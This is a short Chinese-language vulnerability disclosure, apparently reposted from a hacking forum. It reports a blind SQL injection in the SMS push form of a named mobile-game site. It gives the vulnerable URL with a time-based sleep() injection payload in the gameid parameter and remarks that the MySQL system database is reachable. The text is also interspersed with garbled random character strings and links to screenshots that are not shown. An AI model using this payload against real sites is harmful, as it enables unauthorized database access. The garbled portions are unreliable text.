简要描述:
$ b9 a( M9 j+ O; M凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。$ q* \( A Y( L" e
0 a+ V O- I7 V8 f5 [; p; p- ^
详细说明:1 j8 `. @6 f" q6 Z
存在SQL盲注url:$ d, N3 \9 o3 @
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
1 B! @3 u. G9 N5 D jhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
- N1 r+ m6 z, b( d4 Q2 T `5 yhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png, Z$ s. w3 _2 k6 P5 F& r
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg3 h) i8 D+ Y1 _( b; b0 [2 b2 h
6 [" h4 `0 P" F% @( t$ e
能看到mysql系统数据库,看来user权限应该很高的。。 |